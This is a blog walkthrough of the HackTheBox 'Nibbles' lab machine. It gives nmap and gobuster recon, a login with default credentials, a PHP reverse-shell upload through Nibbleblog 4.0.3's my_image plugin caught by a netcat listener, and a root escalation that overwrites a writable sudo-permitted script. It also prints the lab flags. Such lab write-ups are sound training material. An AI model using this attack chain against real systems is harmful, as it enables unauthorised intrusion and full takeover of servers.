· Abhinav Kumar · HackTheBox · 7 min read
HackTheBox - Nibbles w/o Metasploit
HackTheBox Nibbles machine is based on a old CMS vulnerability and sample privilege escalation due to permissions on file.
Bashed
HackTheBox Link to Nibbles Machine - HTB-Bashed
Table of Contents
Recon
Adding hosts file entry for bashed
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ echo '10.10.10.75 nibbles.htb' | sudo tee /etc/hosts
[sudo] password for abhinav:
10.10.10.75 nibbles.htb
# Checking if the host is now rechable
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ ping nibbles.htb
PING nibbles.htb (10.10.10.75) 56(84) bytes of data.
64 bytes from nibbles.htb (10.10.10.75): icmp_seq=1 ttl=63 time=156 ms
Nmap scan
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nmap -p- -T5 nibbles.htb
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 12:22 IST
Warning: 10.10.10.75 giving up on port because retransmission cap hit (2).
Stats: 0:04:49 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 45.92% done; ETC: 12:33 (0:05:42 remaining)
Nmap scan report for nibbles.htb (10.10.10.75)
Host is up (0.16s latency).
Not shown: 64803 closed tcp ports (conn-refused), 730 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 589.78 seconds
No other ports found in full port scan or UDP Scan. We will scan the two found ports 22, 80 again.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sC -sV -A -O -T5 -p22,80 nibbles.htb
[sudo] password for abhinav:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 13:52 IST
Nmap scan report for nibbles.htb (10.10.10.75)
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (96%), Linux 3.13 (96%), Linux 3.2 - 4.9 (96%), Linux 3.8 - 3.11 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 164.09 ms 10.10.14.1
2 164.31 ms nibbles.htb (10.10.10.75)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.27 seconds
Recon on port 80
Checking the page in browser Says Hello World, but nothing more. In the sourcecode view in browser, we se a comment
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
When we check /nibbleblog/ directory in browser we can see Nibbleblog powered CMS. From the source-code of the nibbles, we can see some more directories that are related to CMS like /nibbleblog/themes/ , /nibbleblog/content/
directory scan
We run a Gobuster scan to discover more
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ gobuster dir -u http://nibbles.htb/nibbleblog/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet
/admin (Status: 301) [Size: 321] [--> http://nibbles.htb/nibbleblog/admin/]
/plugins (Status: 301) [Size: 323] [--> http://nibbles.htb/nibbleblog/plugins/]
/content (Status: 301) [Size: 323] [--> http://nibbles.htb/nibbleblog/content/]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 325] [--> http://nibbles.htb/nibbleblog/languages/]
From the Gobuster results, we can explore few links, While checking http://nibbles.htb/nibbleblog/README , we find out the version of NibbleBlog is 4.0.3 .
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release publishDate: 2014-04-01
Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
<redacted rest of the file.>
A Google Search for the CMS with Version number says about few file upload vulnerabilities.
Also reading about vulnerabilities we discover the default (probably) username password for admin login are - admin:nibbles So we login to the admin panel at - http://nibbles.htb/nibbleblog/admin.php
Initial Shell
Reading about few exploitation procedures of Nibble 4.0.3 on this website, we can try the arbitrary file upload onto my-images.
As per the explanation on the exploitation article, we can upload a PHP-reverse-shell and browse it to get shell via netcat.
The PHP Reverseshell can be taken from any website like PentestMonkey. Modify to include your tun0 IP and port. Open Port on netcat and upload the file to website
http://nibbles.htb/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
Click “Configure” under my-images plugin to get upload page.
Now once the shell is uploaded ( example image.php), keep netcat listner ready and browse the reverseshell at - http://nibbles.htb/nibbleblog/content/private/plugins/my_image/image.php/my_image/image.php
and we get a shell.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ nc -nlvp 7777
listening on [any] 7777 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.75] 46192
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
06:55:16 up 7:10, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
$ whoami
nibbler
$ uname -a
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
$
User Flag
Getting the user flag
$ ls /home
nibbler
$ cat /home/nibbler/user.txt
903ded9d1245092bff70d64505fe15fe
$
Privilege Escalation
Let us check what privilleges we have.
$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
$
We can execute the /home/nibbler/personal/stuff/monitor.sh with root privilleges without password.
Right now we cannot access as the file does not exists, I tried and later discovered , it is all in a zip file that is extracted to give the file that can executed with root permissions.
# Tryig to access the file, failed
$ cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
$ ls /home/nibbler/personal/stuff/monitor.sh
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory
#checking contents of home, we find zip file
$ cd /home/nibbler
$ ls
personal.zip
user.txt
#unzip the archive
$ unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
$ ls -l
total 12
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 personal
-r-------- 1 nibbler nibbler 1855 Dec 10 2017 personal.zip
-r-------- 1 nibbler nibbler 33 Sep 4 23:45 user.txt
$ cd personal
$ ls
stuff
$ cd stuff
$ ls
monitor.sh
We have finally the file that can run as root without password, the file is a bash script, and we can write / overwrite over this to execute what we want.
$ pwd
/home/nibbler/personal/stuff
$ ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015 monitor.sh
$
Let us overwrite the file to execute bash.
Inset the below into file.
#!/bin/sh
bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo '!#/bin/sh' > monitor.sh
echo '!#/bin/sh' > monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'bash' >> monitor.sh
echo 'bash' >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
cat monitor.sh #Ignore this
!#/bin/sh
bash
Now Let us execute the file, assigning the execute permissions, and we would be root.
#Setting execute permissions
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -l
ls -l
total 4
-rwxrwxrwx 1 nibbler nibbler 15 Sep 5 07:37 monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh #copy the path, as executing with file name won't work
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/home/nibbler/personal/stuff#
root@Nibbles:/home/nibbler/personal/stuff# whoami
root
root@Nibbles:/home/nibbler/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
So we are now root(#), lets get the root flag.
root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
84522082a88d8486069bec7ca27a7cb0
root@Nibbles:/home/nibbler/personal/stuff#
Learnings
- In case of Web (80/443) or any other web service ports exposed, source code can sometimes help to get in right direction.
- Source code (or view source) can also help us get some directories on the machine.
- If Gobuster or other similar tools dont give results, change endpoint to on of the directories gained from the previous Learning (L2).
- Always check the overly permissive files that execute as other users and writable by the user you are.
- In case of any Application/CMS discovered, always check for the default credentials (username:password).